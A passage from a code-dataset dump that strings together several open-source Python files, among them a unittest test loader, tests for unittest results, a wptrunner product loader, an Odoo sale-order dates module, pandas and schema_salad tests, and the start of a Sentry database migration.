hasattr(getattr(testCaseClass, attrname), '__call__')
testFnNames = filter(isTestMethod, dir(testCaseClass))
if self.sortTestMethodsUsing:
testFnNames.sort(key=_CmpToKey(self.sortTestMethodsUsing))
return testFnNames
def discover(self, start_dir, pattern='test*.py', top_level_dir=None):
"""Find and return all test modules from the specified start
directory, recursing into subdirectories to find them. Only test files
that match the pattern will be loaded. (Using shell style pattern
matching.)
All test modules must be importable from the top level of the project.
If the start directory is not the top level directory then the top
level directory must be specified separately.
If a test package name (directory with '__init__.py') matches the
pattern then the package will be checked for a 'load_tests' function. If
this exists then it will be called with loader, tests, pattern.
If load_tests exists then discovery does *not* recurse into the package,
load_tests is responsible for loading all tests in the package.
The pattern is deliberately not stored as a loader attribute so that
packages can continue discovery themselves. top_level_dir is stored so
load_tests does not need to pass this argument in to loader.discover().
"""
set_implicit_top = False
if top_level_dir is None and self._top_level_dir is not None:
# make top_level_dir optional if called from load_tests in a package
top_level_dir = self._top_level_dir
elif top_level_dir is None:
set_implicit_top = True
top_level_dir = start_dir
top_level_dir = os.path.abspath(top_level_dir)
if not top_level_dir in sys.path:
# all test modules must be importable from the top level directory
# should we *unconditionally* put the start directory in first
# in sys.path to minimise likelihood of conflicts between installed
# modules and development versions?
sys.path.insert(0, top_level_dir)
self._top_level_dir = top_level_dir
is_not_importable = False
if os.path.isdir(os.path.abspath(start_dir)):
start_dir = os.path.abspath(start_dir)
if start_dir != top_level_dir:
is_not_importable = not os.path.isfile(os.path.join(start_dir, '__init__.py'))
else:
# support for discovery from dotted module names
try:
__import__(start_dir)
except ImportError:
is_not_importable = True
else:
the_module = sys.modules[start_dir]
top_part = start_dir.split('.')[0]
start_dir = os.path.abspath(os.path.dirname((the_module.__file__)))
if set_implicit_top:
self._top_level_dir = os.path.abspath(os.path.dirname(os.path.dirname(sys.modules[top_part].__file__)))
sys.path.remove(top_level_dir)
if is_not_importable:
raise ImportError('Start directory is not importable: %r' % start_dir)
tests = list(self._find_tests(start_dir, pattern))
return self.suiteClass(tests)
def _get_name_from_path(self, path):
path = os.path.splitext(os.path.normpath(path))[0]
_relpath = relpath(path, self._top_level_dir)
assert not os.path.isabs(_relpath), "Path must be within the project"
assert not _relpath.startswith('..'), "Path must be within the project"
name = _relpath.replace(os.path.sep, '.')
return name
def _get_module_from_name(self, name):
__import__(name)
return sys.modules[name]
def _match_path(self, path, full_path, pattern):
# override this method to use alternative matching strategy
return fnmatch(path, pattern)
def _find_tests(self, start_dir, pattern):
"""Used by discovery. Yields test suites it loads."""
paths = os.listdir(start_dir)
for path in paths:
full_path = os.path.join(start_dir, path)
if os.path.isfile(full_path):
if not VALID_MODULE_NAME.match(path):
# valid Python identifiers only
continue
if not self._match_path(path, full_path, pattern):
continue
# if the test file matches, load it
name = self._get_name_from_path(full_path)
try:
module = self._get_module_from_name(name)
except:
yield _make_failed_import_test(name, self.suiteClass)
else:
mod_file = os.path.abspath(getattr(module, '__file__', full_path))
realpath = os.path.splitext(mod_file)[0]
fullpath_noext = os.path.splitext(full_path)[0]
if realpath.lower() != fullpath_noext.lower():
module_dir = os.path.dirname(realpath)
mod_name = os.path.splitext(os.path.basename(full_path))[0]
expected_dir = os.path.dirname(full_path)
msg = ("%r module incorrectly imported from %r. Expected %r. "
"Is this module globally installed?")
raise ImportError(msg % (mod_name, module_dir, expected_dir))
yield self.loadTestsFromModule(module)
elif os.path.isdir(full_path):
if not os.path.isfile(os.path.join(full_path, '__init__.py')):
continue
load_tests = None
tests = None
if fnmatch(path, pattern):
# only check load_tests if the package directory itself matches the filter
name = self._get_name_from_path(full_path)
package = self._get_module_from_name(name)
load_tests = getattr(package, 'load_tests', None)
tests = self.loadTestsFromModule(package, use_load_tests=False)
if load_tests is None:
if tests is not None:
# tests loaded from package file
yield tests
# recurse into the package
for test in self._find_tests(full_path, pattern):
yield test
else:
try:
yield load_tests(self, tests, pattern)
except Exception as e:
yield _make_failed_load_tests(package.__name__, e,
self.suiteClass)
defaultTestLoader = TestLoader()
def _makeLoader(prefix, sortUsing, suiteClass=None):
loader = TestLoader()
loader.sortTestMethodsUsing = sortUsing
loader.testMethodPrefix = prefix
if suiteClass:
loader.suiteClass = suiteClass
return loader
def getTestCaseNames(testCaseClass, prefix, sortUsing=cmp):
return _makeLoader(prefix, sortUsing).getTestCaseNames(testCaseClass)
def makeSuite(testCaseClass, prefix='test', sortUsing=cmp,
suiteClass=suite.TestSuite):
return _makeLoader(prefix, sortUsing, suiteClass).loadTestsFromTestCase(testCaseClass)
def findTestCases(module, prefix='test', sortUsing=cmp,
suiteClass=suite.TestSuite):
return _makeLoader(prefix, sortUsing, suiteClass).loadTestsFromModule(module)
| gpl-3.0 |
teosz/servo | tests/wpt/harness/wptrunner/products.py | 118 | 2500 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import os
import importlib
import imp
from .browsers import product_list
def products_enabled(config):
names = config.get("products", {}).keys()
if not names:
return product_list
else:
return names
def product_module(config, product):
here = os.path.join(os.path.split(__file__)[0])
product_dir = os.path.join(here, "browsers")
if product not in products_enabled(config):
raise ValueError("Unknown product %s" % product)
path = config.get("products", {}).get(product, None)
if path:
module = imp.load_source('wptrunner.browsers.' + product, path)
else:
module = importlib.import_module("wptrunner.browsers." + product)
if not hasattr(module, "__wptrunner__"):
raise ValueError("Product module does not define __wptrunner__ variable")
return module
def load_product(config, product):
module = product_module(config, product)
data = module.__wptrunner__
check_args = getattr(module, data["check_args"])
browser_cls = getattr(module, data["browser"])
browser_kwargs = getattr(module, data["browser_kwargs"])
executor_kwargs = getattr(module, data["executor_kwargs"])
env_options = getattr(module, data["env_options"])()
run_info_extras = (getattr(module, data["run_info_extras"])
if "run_info_extras" in data else lambda **kwargs:{})
executor_classes = {}
for test_type, cls_name in data["executor"].iteritems():
cls = getattr(module, cls_name)
executor_classes[test_type] = cls
return (check_args,
browser_cls, browser_kwargs,
executor_classes, executor_kwargs,
env_options, run_info_extras)
def load_product_update(config, product):
"""Return tuple of (property_order, boolean_properties) indicating the
run_info properties to use when constructing the expectation data for
this product. None for either key indicates that the default keys
appropriate for distinguishing based on platform will be used."""
module = product_module(config, product)
data = module.__wptrunner__
update_properties = (getattr(module, data["update_properties"])()
if "update_properties" in data else (None, None))
return update_properties
| mpl-2.0 |
srsman/odoo | addons/sale_order_dates/sale_order_dates.py | 223 | 5308 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime, timedelta
from openerp.osv import fields, osv
from openerp.tools.translate import _
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT
class sale_order_dates(osv.osv):
"""Add several date fields to Sale Orders, computed or user-entered"""
_inherit = 'sale.order'
def _get_date_planned(self, cr, uid, order, line, start_date, context=None):
"""Compute the expected date from the requested date, not the order date"""
if order and order.requested_date:
date_planned = datetime.strptime(order.requested_date, DEFAULT_SERVER_DATETIME_FORMAT)
date_planned -= timedelta(days=order.company_id.security_lead)
return date_planned.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
return super(sale_order_dates, self)._get_date_planned(
cr, uid, order, line, start_date, context=context)
def _get_effective_date(self, cr, uid, ids, name, arg, context=None):
"""Read the shipping date from the related packings"""
# TODO: would be better if it returned the date the picking was processed?
res = {}
dates_list = []
for order in self.browse(cr, uid, ids, context=context):
dates_list = []
for pick in order.picking_ids:
dates_list.append(pick.date)
if dates_list:
res[order.id] = min(dates_list)
else:
res[order.id] = False
return res
def _get_commitment_date(self, cr, uid, ids, name, arg, context=None):
"""Compute the commitment date"""
res = {}
dates_list = []
for order in self.browse(cr, uid, ids, context=context):
dates_list = []
order_datetime = datetime.strptime(order.date_order, DEFAULT_SERVER_DATETIME_FORMAT)
for line in order.order_line:
if line.state == 'cancel':
continue
dt = order_datetime + timedelta(days=line.delay or 0.0)
dt_s = dt.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
dates_list.append(dt_s)
if dates_list:
res[order.id] = min(dates_list)
return res
def onchange_requested_date(self, cr, uid, ids, requested_date,
commitment_date, context=None):
"""Warn if the requested dates is sooner than the commitment date"""
if (requested_date and commitment_date and requested_date < commitment_date):
return {'warning': {
'title': _('Requested date is too soon!'),
'message': _("The date requested by the customer is "
"sooner than the commitment date. You may be "
"unable to honor the customer's request.")
}
}
return {}
_columns = {
'commitment_date': fields.function(_get_commitment_date, store=True,
type='datetime', string='Commitment Date',
help="Date by which the products are sure to be delivered. This is "
"a date that you can promise to the customer, based on the "
"Product Lead Times."),
'requested_date': fields.datetime('Requested Date',
readonly=True, states={'draft': [('readonly', False)],
'sent': [('readonly', False)]}, copy=False,
help="Date by which the customer has requested the items to be "
"delivered.\n"
"When this Order gets confirmed, the Delivery Order's "
"expected date will be computed based on this date and the "
"Company's Security Delay.\n"
"Leave this field empty if you want the Delivery Order to be "
"processed as soon as possible. In that case the expected "
"date will be computed using the default method: based on "
"the Product Lead Times and the Company's Security Delay."),
'effective_date': fields.function(_get_effective_date, type='date',
store=True, string='Effective Date',
help="Date on which the first Delivery Order was created."),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
yousafsyed/casperjs | bin/Lib/unittest/test/test_result.py | 81 | 23247 | import io
import sys
import textwrap
from test import support
import traceback
import unittest
class Test_TestResult(unittest.TestCase):
# Note: there are not separate tests for TestResult.wasSuccessful(),
# TestResult.errors, TestResult.failures, TestResult.testsRun or
# TestResult.shouldStop because these only have meaning in terms of
# other TestResult methods.
#
# Accordingly, tests for the aforenamed attributes are incorporated
# in with the tests for the defining methods.
################################################################
def test_init(self):
result = unittest.TestResult()
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 0)
self.assertEqual(result.shouldStop, False)
self.assertIsNone(result._stdout_buffer)
self.assertIsNone(result._stderr_buffer)
# "This method can be called to signal that the set of tests being
# run should be aborted by setting the TestResult's shouldStop
# attribute to True."
def test_stop(self):
result = unittest.TestResult()
result.stop()
self.assertEqual(result.shouldStop, True)
# "Called when the test case test is about to be run. The default
# implementation simply increments the instance's testsRun counter."
def test_startTest(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
result.stopTest(test)
# "Called after the test case test has been executed, regardless of
# the outcome. The default implementation does nothing."
def test_stopTest(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
result.stopTest(test)
# Same tests as above; make sure nothing has changed
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
# "Called before and after tests are run. The default implementation does nothing."
def test_startTestRun_stopTestRun(self):
result = unittest.TestResult()
result.startTestRun()
result.stopTestRun()
# "addSuccess(test)"
# ...
# "Called when the test case test succeeds"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addSuccess(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
# "addFailure(test, err)"
# ...
# "Called when the test case test signals a failure. err is a tuple of
# the form returned by sys.exc_info(): (type, value, traceback)"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addFailure(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
try:
test.fail("foo")
except:
exc_info_tuple = sys.exc_info()
result = unittest.TestResult()
result.startTest(test)
result.addFailure(test, exc_info_tuple)
result.stopTest(test)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 1)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.failures[0]
self.assertIs(test_case, test)
self.assertIsInstance(formatted_exc, str)
# "addError(test, err)"
# ...
# "Called when the test case test raises an unexpected exception err
# is a tuple of the form returned by sys.exc_info():
# (type, value, traceback)"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addError(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
try:
raise TypeError()
except:
exc_info_tuple = sys.exc_info()
result = unittest.TestResult()
result.startTest(test)
result.addError(test, exc_info_tuple)
result.stopTest(test)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 1)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.errors[0]
self.assertIs(test_case, test)
self.assertIsInstance(formatted_exc, str)
def test_addSubTest(self):
class Foo(unittest.TestCase):
def test_1(self):
nonlocal subtest
with self.subTest(foo=1):
subtest = self._subtest
try:
1/0
except ZeroDivisionError:
exc_info_tuple = sys.exc_info()
# Register an error by hand (to check the API)
result.addSubTest(test, subtest, exc_info_tuple)
# Now trigger a failure
self.fail("some recognizable failure")
subtest = None
test = Foo('test_1')
result = unittest.TestResult()
test.run(result)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 1)
self.assertEqual(len(result.failures), 1)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.errors[0]
self.assertIs(test_case, subtest)
self.assertIn("ZeroDivisionError", formatted_exc)
test_case, formatted_exc = result.failures[0]
self.assertIs(test_case, subtest)
self.assertIn("some recognizable failure", formatted_exc)
def testGetDescriptionWithoutDocstring(self):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
'testGetDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult)')
def testGetSubTestDescriptionWithoutDocstring(self):
with self.subTest(foo=1, bar=2):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetSubTestDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult) (bar=2, foo=1)')
with self.subTest('some message'):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetSubTestDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult) [some message]')
def testGetSubTestDescriptionWithoutDocstringAndParams(self):
with self.subTest():
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetSubTestDescriptionWithoutDocstringAndParams '
'(' + __name__ + '.Test_TestResult) (<subtest>)')
def testGetNestedSubTestDescriptionWithoutDocstring(self):
with self.subTest(foo=1):
with self.subTest(bar=2):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetNestedSubTestDescriptionWithoutDocstring '
'(' + __name__ + '.Test_TestResult) (bar=2, foo=1)')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetDescriptionWithOneLineDocstring(self):
"""Tests getDescription() for a method with a docstring."""
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
('testGetDescriptionWithOneLineDocstring '
'(' + __name__ + '.Test_TestResult)\n'
'Tests getDescription() for a method with a docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetSubTestDescriptionWithOneLineDocstring(self):
"""Tests getDescription() for a method with a docstring."""
result = unittest.TextTestResult(None, True, 1)
with self.subTest(foo=1, bar=2):
self.assertEqual(
result.getDescription(self._subtest),
('testGetSubTestDescriptionWithOneLineDocstring '
'(' + __name__ + '.Test_TestResult) (bar=2, foo=1)\n'
'Tests getDescription() for a method with a docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetDescriptionWithMultiLineDocstring(self):
"""Tests getDescription() for a method with a longer docstring.
The second line of the docstring.
"""
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
('testGetDescriptionWithMultiLineDocstring '
'(' + __name__ + '.Test_TestResult)\n'
'Tests getDescription() for a method with a longer '
'docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetSubTestDescriptionWithMultiLineDocstring(self):
"""Tests getDescription() for a method with a longer docstring.
The second line of the docstring.
"""
result = unittest.TextTestResult(None, True, 1)
with self.subTest(foo=1, bar=2):
self.assertEqual(
result.getDescription(self._subtest),
('testGetSubTestDescriptionWithMultiLineDocstring '
'(' + __name__ + '.Test_TestResult) (bar=2, foo=1)\n'
'Tests getDescription() for a method with a longer '
'docstring.'))
def testStackFrameTrimming(self):
class Frame(object):
class tb_frame(object):
f_globals = {}
result = unittest.TestResult()
self.assertFalse(result._is_relevant_tb_level(Frame))
Frame.tb_frame.f_globals['__unittest'] = True
self.assertTrue(result._is_relevant_tb_level(Frame))
def testFailFast(self):
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addError(None, None)
self.assertTrue(result.shouldStop)
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addFailure(None, None)
self.assertTrue(result.shouldStop)
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addUnexpectedSuccess(None)
self.assertTrue(result.shouldStop)
def testFailFastSetByRunner(self):
runner = unittest.TextTestRunner(stream=io.StringIO(), failfast=True)
def test(result):
self.assertTrue(result.failfast)
result = runner.run(test)
classDict = dict(unittest.TestResult.__dict__)
for m in ('addSkip', 'addExpectedFailure', 'addUnexpectedSuccess',
'__init__'):
del classDict[m]
def __init__(self, stream=None, descriptions=None, verbosity=None):
self.failures = []
self.errors = []
self.testsRun = 0
self.shouldStop = False
self.buffer = False
classDict['__init__'] = __init__
OldResult = type('OldResult', (object,), classDict)
class Test_OldTestResult(unittest.TestCase):
def assertOldResultWarning(self, test, failures):
with support.check_warnings(("TestResult has no add.+ method,",
RuntimeWarning)):
result = OldResult()
test.run(result)
self.assertEqual(len(result.failures), failures)
def testOldTestResult(self):
class Test(unittest.TestCase):
def testSkip(self):
self.skipTest('foobar')
@unittest.expectedFailure
def testExpectedFail(self):
raise TypeError
@unittest.expectedFailure
def testUnexpectedSuccess(self):
pass
for test_name, should_pass in (('testSkip', True),
('testExpectedFail', True),
('testUnexpectedSuccess', False)):
test = Test(test_name)
self.assertOldResultWarning(test, int(not should_pass))
def testOldTestTesultSetup(self):
class Test(unittest.TestCase):
def setUp(self):
self.skipTest('no reason')
def testFoo(self):
pass
self.assertOldResultWarning(Test('testFoo'), 0)
def testOldTestResultClass(self):
@unittest.skip('no reason')
class Test(unittest.TestCase):
def testFoo(self):
pass
self.assertOldResultWarning(Test('testFoo'), 0)
def testOldResultWithRunner(self):
class Test(unittest.TestCase):
def testFoo(self):
pass
runner = unittest.TextTestRunner(resultclass=OldResult,
stream=io.StringIO())
# This will raise an exception if TextTestRunner can't handle old
# test result objects
runner.run(Test('testFoo'))
class MockTraceback(object):
@staticmethod
def format_exception(*_):
return ['A traceback']
def restore_traceback():
unittest.result.traceback = traceback
class TestOutputBuffering(unittest.TestCase):
def setUp(self):
self._real_out = sys.stdout
self._real_err = sys.stderr
def tearDown(self):
sys.stdout = self._real_out
sys.stderr = self._real_err
def testBufferOutputOff(self):
real_out = self._real_out
real_err = self._real_err
result = unittest.TestResult()
self.assertFalse(result.buffer)
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
result.startTest(self)
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
def testBufferOutputStartTestAddSuccess(self):
real_out = self._real_out
real_err = self._real_err
result = unittest.TestResult()
self.assertFalse(result.buffer)
result.buffer = True
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
result.startTest(self)
self.assertIsNot(real_out, sys.stdout)
self.assertIsNot(real_err, sys.stderr)
self.assertIsInstance(sys.stdout, io.StringIO)
self.assertIsInstance(sys.stderr, io.StringIO)
self.assertIsNot(sys.stdout, sys.stderr)
out_stream = sys.stdout
err_stream = sys.stderr
result._original_stdout = io.StringIO()
result._original_stderr = io.StringIO()
print('foo')
print('bar', file=sys.stderr)
self.assertEqual(out_stream.getvalue(), 'foo\n')
self.assertEqual(err_stream.getvalue(), 'bar\n')
self.assertEqual(result._original_stdout.getvalue(), '')
self.assertEqual(result._original_stderr.getvalue(), '')
result.addSuccess(self)
result.stopTest(self)
self.assertIs(sys.stdout, result._original_stdout)
self.assertIs(sys.stderr, result._original_stderr)
self.assertEqual(result._original_stdout.getvalue(), '')
self.assertEqual(result._original_stderr.getvalue(), '')
self.assertEqual(out_stream.getvalue(), '')
self.assertEqual(err_stream.getvalue(), '')
def getStartedResult(self):
result = unittest.TestResult()
result.buffer = True
result.startTest(self)
return result
def testBufferOutputAddErrorOrFailure(self):
unittest.result.traceback = MockTraceback
self.addCleanup(restore_traceback)
for message_attr, add_attr, include_error in [
('errors', 'addError', True),
('failures', 'addFailure', False),
('errors', 'addError', True),
('failures', 'addFailure', False)
]:
result = self.getStartedResult()
buffered_out = sys.stdout
buffered_err = sys.stderr
result._original_stdout = io.StringIO()
result._original_stderr = io.StringIO()
print('foo', file=sys.stdout)
if include_error:
print('bar', file=sys.stderr)
addFunction = getattr(result, add_attr)
addFunction(self, (None, None, None))
result.stopTest(self)
result_list = getattr(result, message_attr)
self.assertEqual(len(result_list), 1)
test, message = result_list[0]
expectedOutMessage = textwrap.dedent("""
Stdout:
foo
""")
expectedErrMessage = ''
if include_error:
expectedErrMessage = textwrap.dedent("""
Stderr:
bar
""")
expectedFullMessage = 'A traceback%s%s' % (expectedOutMessage, expectedErrMessage)
self.assertIs(test, self)
self.assertEqual(result._original_stdout.getvalue(), expectedOutMessage)
self.assertEqual(result._original_stderr.getvalue(), expectedErrMessage)
self.assertMultiLineEqual(message, expectedFullMessage)
def testBufferSetupClass(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def setUpClass(cls):
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferTearDownClass(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def tearDownClass(cls):
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferSetUpModule(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def setUpModule():
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferTearDownModule(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def tearDownModule():
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
if __name__ == '__main__':
unittest.main()
| mit |
winklerand/pandas | pandas/tests/test_errors.py | 9 | 1147 | # -*- coding: utf-8 -*-
import pytest
from warnings import catch_warnings
import pandas # noqa
import pandas as pd
@pytest.mark.parametrize(
"exc", ['UnsupportedFunctionCall', 'UnsortedIndexError',
'OutOfBoundsDatetime',
'ParserError', 'PerformanceWarning', 'DtypeWarning',
'EmptyDataError', 'ParserWarning', 'MergeError'])
def test_exception_importable(exc):
from pandas import errors
e = getattr(errors, exc)
assert e is not None
# check that we can raise on them
with pytest.raises(e):
raise e()
def test_catch_oob():
from pandas import errors
try:
pd.Timestamp('15000101')
except errors.OutOfBoundsDatetime:
pass
def test_error_rename():
# see gh-12665
from pandas.errors import ParserError
from pandas.io.common import CParserError
try:
raise CParserError()
except ParserError:
pass
try:
raise ParserError()
except CParserError:
pass
with catch_warnings(record=True):
try:
raise ParserError()
except pd.parser.CParserError:
pass
| bsd-3-clause |
mr-c/common-workflow-language | v1.0/salad/schema_salad/tests/test_cli_args.py | 8 | 1199 | from __future__ import absolute_import
import unittest
import sys
import schema_salad.main as cli_parser
# for capturing print() output
from contextlib import contextmanager
from six import StringIO
@contextmanager
def captured_output():
new_out, new_err = StringIO(), StringIO()
old_out, old_err = sys.stdout, sys.stderr
try:
sys.stdout, sys.stderr = new_out, new_err
yield sys.stdout, sys.stderr
finally:
sys.stdout, sys.stderr = old_out, old_err
""" test different sets of command line arguments"""
class ParseCliArgs(unittest.TestCase):
def test_version(self):
args = [["--version"], ["-v"]]
for arg in args:
with captured_output() as (out, err):
cli_parser.main(arg)
response = out.getvalue().strip() # capture output and strip newline
self.assertTrue("Current version" in response)
def test_empty_input(self):
# running schema_salad tool wihtout any args
args = []
with captured_output() as (out, err):
cli_parser.main(args)
response = out.getvalue().strip()
self.assertTrue("error: too few arguments" in response)
| apache-2.0 |
NickPresta/sentry | src/sentry/migrations/0032_auto__add_eventmeta.py | 7 | 14351 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'GroupMeta'
db.create_table('sentry_groupmeta', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('group', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sentry.Group'])),
('key', self.gf('django.db.models.fields.CharField')(max_length=64)),
('value', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal('sentry', ['GroupMeta'])
# Adding unique constraint on 'GroupMeta', fields ['group', 'key', 'value']
db.create_unique('sentry_groupmeta', ['group_id', 'key'])
def backwards(self, orm):
# Removing unique constraint on 'GroupMeta', fields ['group', 'key', 'value']
db.delete_unique('sentry_groupmeta', ['group_id', 'key'])
# Deleting model 'GroupMeta'
db.delete_table('sentry_groupmeta')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
